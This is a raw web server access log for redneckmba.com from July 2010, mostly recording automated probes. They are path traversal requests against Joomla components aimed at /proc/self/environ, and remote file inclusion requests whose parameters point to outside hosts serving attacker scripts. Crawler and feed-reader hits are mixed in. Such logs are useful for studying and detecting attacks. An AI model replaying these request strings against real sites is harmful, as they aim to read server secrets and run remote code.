84.255.193.115 - - [19/Jul/2010:00:53:58 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:53:59 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:53:59 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:54:45 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:54:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:54:45 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:56:16 -0700] "GET /logs/access_100607.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:56:16 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:56:16 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:56:18 -0700] "GET /logs/access_100614.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:56:18 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:56:18 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:56:51 -0700] "GET /logs/access_100607.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:56:51 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:56:52 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
174.136.19.132 - - [19/Jul/2010:00:57:22 -0700] "GET /errors.php?error=http://madonnafanzine.com/joomlafanzine/media/system/js/test?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "redneckmba.com"
174.136.19.132 - - [19/Jul/2010:00:57:22 -0700] "GET /logs/errors.php?error=http://madonnafanzine.com/joomlafanzine/media/system/js/test?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "redneckmba.com"
174.136.19.132 - - [19/Jul/2010:00:57:23 -0700] "GET /errors.php?error=http://madonnafanzine.com/joomlafanzine/media/system/js/test?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.redneckmba.com"
174.136.19.132 - - [19/Jul/2010:00:57:23 -0700] "GET /logs/errors.php?error=http://madonnafanzine.com/joomlafanzine/media/system/js/test?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:58:13 -0700] "GET /logs/access_100607.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:58:13 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
84.255.193.115 - - [19/Jul/2010:00:58:13 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
64.207.204.37 - - [19/Jul/2010:00:58:19 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:00:58:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:00:58:19 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:01:01:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [19/Jul/2010:01:01:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:01:59 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:01:59 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:02:02 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:02:03 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:02:10 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:02:11 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:02:14 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:02:15 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.redneckmba.com"
81.21.78.22 - - [19/Jul/2010:01:04:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
81.21.78.22 - - [19/Jul/2010:01:04:46 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:06:56 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:06:56 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:07:24 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "redneckmba.com"
94.23.46.76 - - [19/Jul/2010:01:07:25 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.mesarbustes.fr/media/catalog/category/a/p/test?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "redneckmba.com"
174.136.19.132 - - [19/Jul/2010:01:08:40 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://madonnafanzine.com/joomlafanzine/media/system/js/test?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.redneckmba.com"
174.136.19.132 - - [19/Jul/2010:01:08:40 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://madonnafanzine.com/joomlafanzine/media/system/js/test?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.redneckmba.com"
174.136.19.132 - - [19/Jul/2010:01:08:41 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://madonnafanzine.com/joomlafanzine/media/system/js/test?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "redneckmba.com"
174.136.19.132 - - [19/Jul/2010:01:08:41 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://madonnafanzine.com/joomlafanzine/media/system/js/test?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "redneckmba.com"
66.163.171.205 - - [19/Jul/2010:01:09:49 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.195 - - [19/Jul/2010:01:16:18 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.207.204.37 - - [19/Jul/2010:01:35:43 -0700] "GET /logs/access_100607.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [19/Jul/2010:01:35:43 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
64.207.204.37 - - [19/Jul/2010:01:35:43 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
81.21.78.22 - - [19/Jul/2010:01:39:02 -0700] "GET /logs/access_100607.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
81.21.78.22 - - [19/Jul/2010:01:39:03 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
81.21.78.22 - - [19/Jul/2010:01:39:03 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
76.13.114.106 - - [19/Jul/2010:01:43:46 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.21.78.22 - - [19/Jul/2010:01:45:48 -0700] "GET /logs/access_100614.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [19/Jul/2010:01:45:48 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [19/Jul/2010:01:45:48 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
67.195.115.240 - - [19/Jul/2010:01:48:36 -0700] "GET /?N=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
67.195.115.240 - - [19/Jul/2010:01:57:20 -0700] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "redneckmba.com"
66.163.171.206 - - [19/Jul/2010:01:58:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.123.194 - - [19/Jul/2010:02:23:12 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [19/Jul/2010:02:26:37 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.249.65.89 - - [19/Jul/2010:02:39:56 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "redneckmba.com"
66.249.65.89 - - [19/Jul/2010:02:39:56 -0700] "GET /logs/access_100405.log HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "redneckmba.com"
189.108.172.26 - - [19/Jul/2010:02:41:14 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
189.108.172.26 - - [19/Jul/2010:02:41:14 -0700] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
66.163.171.205 - - [19/Jul/2010:02:50:46 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
67.205.67.73 - - [19/Jul/2010:02:52:41 -0700] "GET /common/db.php?commonpath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [19/Jul/2010:02:52:42 -0700] "GET /common/db.php?commonpath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
189.108.172.26 - - [19/Jul/2010:02:54:08 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
189.108.172.26 - - [19/Jul/2010:03:04:36 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
189.108.172.26 - - [19/Jul/2010:03:04:37 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
189.108.172.26 - - [19/Jul/2010:03:04:39 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.114.105 - - [19/Jul/2010:03:13:34 -0700] "GET /blog/?feed=rss2 HTTP/1.0" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
189.108.172.26 - - [19/Jul/2010:03:14:39 -0700] "GET /logs/access.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
189.108.172.26 - - [19/Jul/2010:03:14:40 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
189.108.172.26 - - [19/Jul/2010:03:14:42 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.191.115.202 - - [19/Jul/2010:03:23:50 -0700] "GET /logs/access.log%20%20//?_PHPLIB[libdir]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [19/Jul/2010:03:23:50 -0700] "GET /?_PHPLIB[libdir]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.redneckmba.com"
76.191.115.202 - - [19/Jul/2010:03:23:50 -0700] "GET /logs//?_PHPLIB[libdir]=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 200 2087 "-" "Mozilla/5.0" "www.redneckmba.com"
67.205.67.73 - - [19/Jul/2010:03:25:57 -0700] "GET /logs/scripts.log//common/db.php?commonpath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [19/Jul/2010:03:25:57 -0700] "GET /common/db.php?commonpath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [19/Jul/2010:03:25:57 -0700] "GET /logs//common/db.php?commonpath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [19/Jul/2010:03:25:59 -0700] "GET /logs/scripts.log//common/db.php?commonpath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [19/Jul/2010:03:25:59 -0700] "GET /common/db.php?commonpath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
67.205.67.73 - - [19/Jul/2010:03:25:59 -0700] "GET /logs//common/db.php?commonpath=http://www.eroticnorthamerica.com/new//admin/classes/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
200.29.171.35 - - [19/Jul/2010:03:34:52 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
200.29.171.35 - - [19/Jul/2010:03:34:52 -0700] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.biegaj.isp.net.pl/portal/media/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.194 - - [19/Jul/2010:03:35:56 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.205 - - [19/Jul/2010:03:46:09 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.80.193.30 - - [19/Jul/2010:04:00:26 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; FunWebProducts; .NET CLR 2.0.50727; ZangoToolbar 4.8.3; yplus 5.1.04b)" "redneckmba.com"
76.13.114.107 - - [19/Jul/2010:04:04:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
81.21.78.22 - - [19/Jul/2010:04:21:31 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [19/Jul/2010:04:25:35 -0700] "GET /logs/access.log/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [19/Jul/2010:04:25:35 -0700] "GET /index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.21.78.22 - - [19/Jul/2010:04:25:36 -0700] "GET /logs/index.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
81.176.226.194 - - [19/Jul/2010:04:39:15 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img05.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
81.176.226.194 - - [19/Jul/2010:04:39:15 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img05.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:04:42:12 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:04:42:12 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:04:42:22 -0700] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:04:42:23 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
81.176.226.194 - - [19/Jul/2010:04:44:04 -0700] "GET /logs/access.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img05.jpg??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
66.163.171.206 - - [19/Jul/2010:04:48:17 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.75.148.62 - - [19/Jul/2010:04:51:05 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
208.75.148.62 - - [19/Jul/2010:04:51:17 -0700] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.astrofest.nl/bin/img03.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.833" "www.redneckmba.com"
64.207.204.37 - - [19/Jul/2010:04:56:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.13.123.194 - - [19/Jul/2010:04:58:02 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [19/Jul/2010:05:04:16 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
189.108.172.26 - - [19/Jul/2010:05:11:58 -0700] "GET /logs/access_100607.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
189.108.172.26 - - [19/Jul/2010:05:11:59 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
189.108.172.26 - - [19/Jul/2010:05:12:00 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://pinoydeal.ph/log/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "redneckmba.com"
87.252.2.168 - - [19/Jul/2010:05:14:37 -0700] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
